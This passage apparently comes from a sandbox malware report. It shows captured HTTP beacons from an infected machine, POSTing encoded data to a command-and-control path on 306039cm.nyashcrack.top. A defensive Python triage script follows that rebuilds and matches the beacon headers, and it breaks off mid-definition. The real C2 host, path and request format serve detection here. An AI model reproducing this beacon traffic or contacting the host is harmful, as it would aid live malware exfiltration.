Dec 9, 2024 16:02:07.658607006 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:02:07.918591976 CET | 308 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 09 Dec 2024 15:02:06 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 152
  Connection: keep-alive
  Data Raw: 0f 15 24 53 23 26 0d 1d 22 01 20 56 2d 04 25 1e 22 2f 23 17 28 00 23 5b 25 30 20 07 2c 01 0f 0c 22 55 29 07 28 32 30 55 2b 32 3f 0a 21 1f 21 5a 06 1e 25 5d 33 3d 0a 1d 2c 22 28 58 3c 0f 32 16 34 3e 27 5d 24 23 20 1d 32 2f 33 07 24 2f 38 0a 2f 1d 25 0c 29 58 23 08 3c 3c 2c 01 24 3f 2b 53 0e 1f 23 04 2a 1f 3d 57 3c 3e 24 0f 22 2f 28 53 26 58 2e 54 25 0b 3f 08 3c 3a 39 55 2b 33 3f 1e 37 03 02 52 31 3c 25 5e 3c 01 30 0a 24 33 20 5e 22 0f 2f 52 00 31 5c 4d
  Data Ascii: $S#&" V-%"/#(#[%0 ,"U)(20U+2?!!Z%]3=,"(X<24>']$# 2/3$/8/%)X#<<,$?+S#*=W<>$"/(S&X.T%?<:9U+3?7R1<%^<0$3 ^"/R1\M


Session ID: 27 | Source IP: 192.168.2.4 | Source Port: 49946 | Destination IP: 37.44.238.250 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:02:06.509105921 CET | 342 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
  Host: 306039cm.nyashcrack.top
  Content-Length: 1040
  Expect: 100-continue
  Connection: Keep-Alive
Dec 9, 2024 16:02:06.859740973 CET | 1040 | OUT | Data Raw: 59 5b 5b 53 5f 40 59 5e 5c 5c 56 57 50 5e 5b 59 5f 5d 59 5e 56 5e 51 57 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
  Data Ascii: Y[[S_@Y^\\VWP^[Y_]Y^V^QWXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P B8&\!*!_"5;')S?&(%Z=%R#U(*+<=?_(*&^#,X
Dec 9, 2024 16:02:07.778985977 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:02:08.171662092 CET | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 09 Dec 2024 15:02:07 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3d 5d 5d 5a
  Data Ascii: =]]Z


Session ID: 28 | Source IP: 192.168.2.4 | Source Port: 49951 | Destination IP: 37.44.238.250 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:02:08.473742962 CET | 318 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
  Host: 306039cm.nyashcrack.top
  Content-Length: 1040
  Expect: 100-continue
Dec 9, 2024 16:02:08.828561068 CET | 1040 | OUT | Data Raw: 59 59 5e 5e 5f 43 5c 58 5c 5c 56 57 50 5f 5b 5d 5f 5d 59 5a 56 5b 51 5f 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
  Data Ascii: YY^^_C\X\\VWP_[]_]YZV[Q_XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P#85 )" ;')<7+05*>",6P++>=_(*&^#,X ;
Dec 9, 2024 16:02:09.746181011 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:02:09.981959105 CET | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 09 Dec 2024 15:02:08 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3d 5d 5d 5a
  Data Ascii: =]]Z


Session ID 29: 192.168.2.4:49957 -> 37.44.238.250:80
Dec 9, 2024 16:02:10.227649927 CET  342 bytes  OUT
  POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
  Host: 306039cm.nyashcrack.top
  Content-Length: 1040
  Expect: 100-continue
  Connection: Keep-Alive
Dec 9, 2024 16:02:10.578520060 CET  1040 bytes  OUT
  Data Raw: 5c 5d 5e 56 5f 4b 59 5b 5c 5c 56 57 50 5a 5b 51 5f 5d 59 5e 56 52 51 56 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
  Data Ascii: \]^V_KY[\\VWPZ[Q_]Y^VRQVXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P B,""\"*- ['*(? X085**Q#/<9?>.'\(:&^#,X /
Dec 9, 2024 16:02:11.573611021 CET  25 bytes  IN
  HTTP/1.1 100 Continue
Dec 9, 2024 16:02:11.799288034 CET  158 bytes  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 09 Dec 2024 15:02:10 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3d 5d 5d 5a
  Data Ascii: =]]Z


Session ID 30: 192.168.2.4:49963 -> 37.44.238.250:80
Dec 9, 2024 16:02:12.040199041 CET  342 bytes  OUT
  POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
  Host: 306039cm.nyashcrack.top
  Content-Length: 1040
  Expect: 100-continue
  Connection: Keep-Alive
Dec 9, 2024 16:02:12.390945911 CET  1040 bytes  OUT
  Data Raw: 5c 5e 5b 53 5f 4a 59 5a 5c 5c 56 57 50 50 5b 58 5f 51 59 5c 56 5d 51 5a 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
  Data Ascii: \^[S_JYZ\\VWPP[X_QY\V]QZXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P D82) :)^#2)4+$$5Y(%)41+)0@?#_+&^#,X


Session ID 31: 192.168.2.4:49965 -> 37.44.238.250:80
Dec 9, 2024 16:02:13.047301054 CET  342 bytes  OUT
  POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
  Host: 306039cm.nyashcrack.top
  Content-Length: 1756
  Expect: 100-continue
  Connection: Keep-Alive
Dec 9, 2024 16:02:13.406625986 CET  1756 bytes  OUT
  Data Raw: 59 59 5b 53 5f 4b 59 5a 5c 5c 56 57 50 5f 5b 5a 5f 5c 59 5c 56 53 51 57 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
  Data Ascii: YY[S_KYZ\\VWP_[Z_\Y\VSQWXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P -"&["-Y &(&T(4]'^5Y*&"W75?94D(['?&^#,X ;
Dec 9, 2024 16:02:14.318631887 CET  25 bytes  IN
  HTTP/1.1 100 Continue
Dec 9, 2024 16:02:14.553776026 CET  308 bytes  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 09 Dec 2024 15:02:13 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 152
  Connection: keep-alive
  Data Raw: 0f 15 27 0d 21 35 3f 12 36 16 24 57 3a 03 2e 05 21 3c 23 15 3c 07 38 04 32 0a 23 17 2c 11 32 1c 21 0d 39 03 2b 1f 34 52 3f 0f 09 0b 21 25 21 5a 06 1e 25 5d 30 03 3c 54 2d 21 27 04 28 0f 2d 07 37 00 0e 07 27 55 37 0c 27 2f 0e 59 25 2c 27 53 2c 55 31 0e 3e 3d 23 08 3f 3c 27 5a 24 3f 2b 53 0e 1f 23 03 29 31 32 0c 29 3e 24 0a 21 11 05 0d 26 3d 35 0f 26 21 2c 55 28 2a 18 0c 3f 0a 2b 52 34 3e 3c 57 25 05 2e 06 3e 2f 2c 0b 25 09 20 5e 22 0f 2f 52 00 31 5c 4d
  Data Ascii: '!5?6$W:.!<#<82#,2!9+4R?!%!Z%]0<T-!'(-7'U7'/Y%,'S,U1>=#?<'Z$?+S#)12)>$!&=5&!,U(*?+R4><W%.>/,% ^"/R1\M


Session ID 32: 192.168.2.4:49966 -> 37.44.238.250:80
Dec 9, 2024 16:02:13.171066999 CET  342 bytes  OUT
  POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
  Host: 306039cm.nyashcrack.top
  Content-Length: 1040
  Expect: 100-continue
  Connection: Keep-Alive
Dec 9, 2024 16:02:13.516032934 CET  1040 bytes  OUT
  Data Raw: 59 5b 5e 50 5a 43 59 58 5c 5c 56 57 50 5b 5b 59 5f 5e 59 59 56 53 51 58 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
  Data Ascii: Y[^PZCYX\\VWP[[Y_^YYVSQXXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P C85>454Z':,+]$;)Y>%.S 1+)$@<.'**&^#,X +
Dec 9, 2024 16:02:14.442814112 CET  25 bytes  IN
  HTTP/1.1 100 Continue
Dec 9, 2024 16:02:14.677802086 CET  158 bytes  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 09 Dec 2024 15:02:13 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3d 5d 5d 5a
  Data Ascii: =]]Z


Session ID 33: 192.168.2.4:49971 -> 37.44.238.250:80
Dec 9, 2024 16:02:14.920442104 CET  318 bytes  OUT
  POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
  Host: 306039cm.nyashcrack.top
  Content-Length: 1040
  Expect: 100-continue
Dec 9, 2024 16:02:15.265995979 CET  1040 bytes  OUT
  Data Raw: 5c 5d 5b 53 5f 4b 59 59 5c 5c 56 57 50 50 5b 58 5f 5d 59 5d 56 59 51 5b 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
  Data Ascii: \][S_KYY\\VWPP[X_]Y]VYQ[XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P E/2""%X#S$')3< \0Z*27<2<'(0<&^#,X
Dec 9, 2024 16:02:16.215329885 CET  25 bytes  IN
  HTTP/1.1 100 Continue
Dec 9, 2024 16:02:16.449781895 CET  158 bytes  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 09 Dec 2024 15:02:15 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3d 5d 5d 5a
  Data Ascii: =]]Z


Session ID 34: 192.168.2.4:49977 -> 37.44.238.250:80
Dec 9, 2024 16:02:16.696455956 CET  342 bytes  OUT
  POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
  Host: 306039cm.nyashcrack.top
  Content-Length: 1040
  Expect: 100-continue
  Connection: Keep-Alive
Dec 9, 2024 16:02:17.047188044 CET  1040 bytes  OUT
  Data Raw: 59 54 5b 55 5f 45 59 5f 5c 5c 56 57 50 5a 5b 5a 5f 59 59 5f 56 58 51 5e 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
  Data Ascii: YT[U_EY_\\VWPZ[Z_YY_VXQ^XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P E/ *^"%;%#(7?&(:*5= P()0<Z(&^#,X /
Dec 9, 2024 16:02:17.966264963 CET  25 bytes  IN
  HTTP/1.1 100 Continue
Dec 9, 2024 16:02:18.201807976 CET  158 bytes  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 09 Dec 2024 15:02:17 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3d 5d 5d 5a
  Data Ascii: =]]Z


Session ID 35: 192.168.2.4:49982 -> 37.44.238.250:80
Dec 9, 2024 16:02:18.447242022 CET  342 bytes  OUT
  POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
  Host: 306039cm.nyashcrack.top
  Content-Length: 1040
  Expect: 100-continue
  Connection: Keep-Alive
Dec 9, 2024 16:02:18.797169924 CET  1040 bytes  OUT
  Data Raw: 59 5e 5b 53 5f 44 59 58 5c 5c 56 57 50 5e 5b 51 5f 51 59 58 56 53 51 5f 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
  Data Ascii: Y^[S_DYX\\VWP^[Q_QYXVSQ_XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P#,26\!:)7%<'),V(8\389Y=624P+<B??<&^#,X


Session ID 36: 192.168.2.4:49985 -> 37.44.238.250:80
Dec 9, 2024 16:02:19.683983088 CET  342 bytes  OUT
  POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
  Host: 306039cm.nyashcrack.top
  Content-Length: 1720
  Expect: 100-continue
  Connection: Keep-Alive
Dec 9, 2024 16:02:20.032031059 CET  1720 bytes  OUT
  Data Raw: 59 5f 5b 52 5a 41 59 5d 5c 5c 56 57 50 59 5b 51 5f 59 59 5f 56 5f 51 5a 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
  Data Ascii: Y_[RZAY]\\VWPY[Q_YY_V_QZXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P A;2569!]754%<U<'<\$=69#?2(<C<_+*&^#,X
Dec 9, 2024 16:02:20.967525959 CET  25 bytes  IN
  HTTP/1.1 100 Continue
Dec 9, 2024 16:02:21.185417891 CET  308 bytes  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 09 Dec 2024 15:02:20 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 152
  Connection: keep-alive
  Data Raw: 0f 15 24 52 35 25 2f 59 35 38 3c 1f 3a 3e 25 5c 22 12 38 05 3f 00 01 5b 24 33 09 5e 38 2c 3e 50 36 33 31 06 2b 57 3b 0e 28 0f 20 1e 35 35 21 5a 06 1e 25 5c 26 3d 0e 1e 2d 21 3c 5b 2b 57 36 5f 34 07 2f 17 24 0d 3f 0e 25 2c 24 5c 24 01 3f 52 3b 0d 25 0c 29 58 37 45 2b 11 28 06 24 2f 2b 53 0e 1f 23 03 3d 1f 22 0a 3c 2e 3f 53 22 01 24 57 26 3e 36 1d 26 32 0a 19 3c 2a 3d 1f 3f 20 37 57 34 13 3f 08 31 3c 03 58 3c 06 2f 14 25 33 20 5e 22 0f 2f 52 00 31 5c 4d
  Data Ascii: $R5%/Y58<:>%\"8?[$3^8,>P631+W;( 55!Z%\&=-!<[+W6_4/$?%,$\$?R;%)X7E+($/+S#="<.?S"$W&>6&2<*=? 7W4?1<X</%3 ^"/R1\M


Session ID 37: 192.168.2.4:49986 -> 37.44.238.250:80
Dec 9, 2024 16:02:19.810553074 CET  342 bytes  OUT
  POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
  Host: 306039cm.nyashcrack.top
  Content-Length: 1040
  Expect: 100-continue
  Connection: Keep-Alive
Dec 9, 2024 16:02:20.159682035 CET  1040 bytes  OUT
  Data Raw: 59 5c 5e 50 5a 40 59 52 5c 5c 56 57 50 5a 5b 5a 5f 51 59 59 56 5d 51 58 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
  Data Ascii: Y\^PZ@YR\\VWPZ[Z_QYYV]QXXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P /25!*%] 4&_,U<$38)=6- 2+9?<;?*&^#,X /
Dec 9, 2024 16:02:21.082212925 CET  25 bytes  IN
  HTTP/1.1 100 Continue
Dec 9, 2024 16:02:21.321890116 CET  158 bytes  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 09 Dec 2024 15:02:20 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3d 5d 5d 5a
  Data Ascii: =]]Z


Session ID 38: 192.168.2.4:49991 -> 37.44.238.250:80
Dec 9, 2024 16:02:21.574626923 CET  318 bytes  OUT
  POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
  Host: 306039cm.nyashcrack.top
  Content-Length: 1040
  Expect: 100-continue
Dec 9, 2024 16:02:21.924679041 CET  1040 bytes  OUT
  Data Raw: 59 54 5e 5f 5f 4b 59 5f 5c 5c 56 57 50 5b 5b 59 5f 58 59 54 56 53 51 5e 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
  Data Ascii: YT^__KY_\\VWP[[Y_XYTVSQ^XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P E;12_6"7%9?(7;$)(%>P#?%<9D+=?\**&^#,X +
Dec 9, 2024 16:02:22.844572067 CET  25 bytes  IN
  HTTP/1.1 100 Continue
Dec 9, 2024 16:02:23.077614069 CET  158 bytes  IN
  HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 09 Dec 2024 15:02:22 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3d 5d 5d 5a
  Data Ascii: =]]Z
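Added example (not part of the Joe Sandbox report and not DCRat's own code): a Python triage script over the sessions above. It rebuilds the request head and checks that its length reproduces the 342-byte and 318-byte figures in the capture (the 24-byte difference is the missing "Connection: Keep-Alive" line in sessions 33, 38 and 39), matches request heads against the header profile these beacons share, derives the beacon cadence from the request timestamps, and marks the offsets in the body previews that never change from session to session. Every literal is transcribed from sessions 29 to 39 on this page; the function names and the SESSIONS table are my own, and reading the constant offsets as identifier or key material and the varying ones as a counter or timestamp is a hypothesis, not something the report states.

```python
"""Triage helpers for the DCRat C2 capture above (added example, not report code).
All literals are transcribed from sessions 29-39; names and structure are mine."""
from datetime import datetime
from statistics import median

C2_HOST = "306039cm.nyashcrack.top"
C2_PATH = "/geoGeneratorwordpresswpprivatetempDownloads.php"
C2_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
         "(KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36")
ACK_BODY = bytes.fromhex("3d 5d 5d 5a")   # the 4-byte "=]]Z" reply to a plain beacon

# (session id, request timestamp, Content-Length, Connection header present,
#  first 32 bytes of the "Data Raw" body preview) -- transcribed from the capture.
SESSIONS = [
    (29, "Dec 9, 2024 16:02:10.227649927", 1040, True,
     "5c 5d 5e 56 5f 4b 59 5b 5c 5c 56 57 50 5a 5b 51 5f 5d 59 5e 56 52 51 56 58 52 5d 5e 51 5e 58 51"),
    (30, "Dec 9, 2024 16:02:12.040199041", 1040, True,
     "5c 5e 5b 53 5f 4a 59 5a 5c 5c 56 57 50 50 5b 58 5f 51 59 5c 56 5d 51 5a 58 52 5d 5e 51 5e 58 51"),
    (31, "Dec 9, 2024 16:02:13.047301054", 1756, True,
     "59 59 5b 53 5f 4b 59 5a 5c 5c 56 57 50 5f 5b 5a 5f 5c 59 5c 56 53 51 57 58 52 5d 5e 51 5e 58 51"),
    (32, "Dec 9, 2024 16:02:13.171066999", 1040, True,
     "59 5b 5e 50 5a 43 59 58 5c 5c 56 57 50 5b 5b 59 5f 5e 59 59 56 53 51 58 58 52 5d 5e 51 5e 58 51"),
    (33, "Dec 9, 2024 16:02:14.920442104", 1040, False,
     "5c 5d 5b 53 5f 4b 59 59 5c 5c 56 57 50 50 5b 58 5f 5d 59 5d 56 59 51 5b 58 52 5d 5e 51 5e 58 51"),
    (34, "Dec 9, 2024 16:02:16.696455956", 1040, True,
     "59 54 5b 55 5f 45 59 5f 5c 5c 56 57 50 5a 5b 5a 5f 59 59 5f 56 58 51 5e 58 52 5d 5e 51 5e 58 51"),
    (35, "Dec 9, 2024 16:02:18.447242022", 1040, True,
     "59 5e 5b 53 5f 44 59 58 5c 5c 56 57 50 5e 5b 51 5f 51 59 58 56 53 51 5f 58 52 5d 5e 51 5e 58 51"),
    (36, "Dec 9, 2024 16:02:19.683983088", 1720, True,
     "59 5f 5b 52 5a 41 59 5d 5c 5c 56 57 50 59 5b 51 5f 59 59 5f 56 5f 51 5a 58 52 5d 5e 51 5e 58 51"),
    (37, "Dec 9, 2024 16:02:19.810553074", 1040, True,
     "59 5c 5e 50 5a 40 59 52 5c 5c 56 57 50 5a 5b 5a 5f 51 59 59 56 5d 51 58 58 52 5d 5e 51 5e 58 51"),
    (38, "Dec 9, 2024 16:02:21.574626923", 1040, False,
     "59 54 5e 5f 5f 4b 59 5f 5c 5c 56 57 50 5b 5b 59 5f 58 59 54 56 53 51 5e 58 52 5d 5e 51 5e 58 51"),
    (39, "Dec 9, 2024 16:02:23.370908976", 1040, False,
     "59 5d 5e 51 5a 47 59 5e 5c 5c 56 57 50 50 5b 50 5f 5f 59 5e 56 5c 51 5a 58 52 5d 5e 51 5e 58 51"),
]


def request_head(content_length, keep_alive):
    """Rebuild the request head exactly as the capture shows it, CRLF framed."""
    lines = [
        f"POST {C2_PATH} HTTP/1.1",
        "Content-Type: application/x-www-form-urlencoded",
        f"User-Agent: {C2_UA}",
        f"Host: {C2_HOST}",
        f"Content-Length: {content_length}",
        "Expect: 100-continue",
    ]
    if keep_alive:
        lines.append("Connection: Keep-Alive")
    return "\r\n".join(lines) + "\r\n\r\n"


def parse_head(raw):
    """Minimal HTTP/1.1 request-head parser: (method, path, {lowercased name: value})."""
    request_line, _, rest = raw.partition("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in rest.split("\r\n"):
        if not line:            # empty line ends the head
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def matches_capture_profile(raw):
    """True when a request head carries every header-level trait shared by the beacons
    above.  Connection is deliberately not required: sessions 33, 38 and 39 omit it."""
    method, path, h = parse_head(raw)
    return (method == "POST" and path == C2_PATH
            and h.get("host") == C2_HOST
            and h.get("user-agent") == C2_UA
            and h.get("content-type") == "application/x-www-form-urlencoded"
            and h.get("expect") == "100-continue")


def parse_timestamp(ts):
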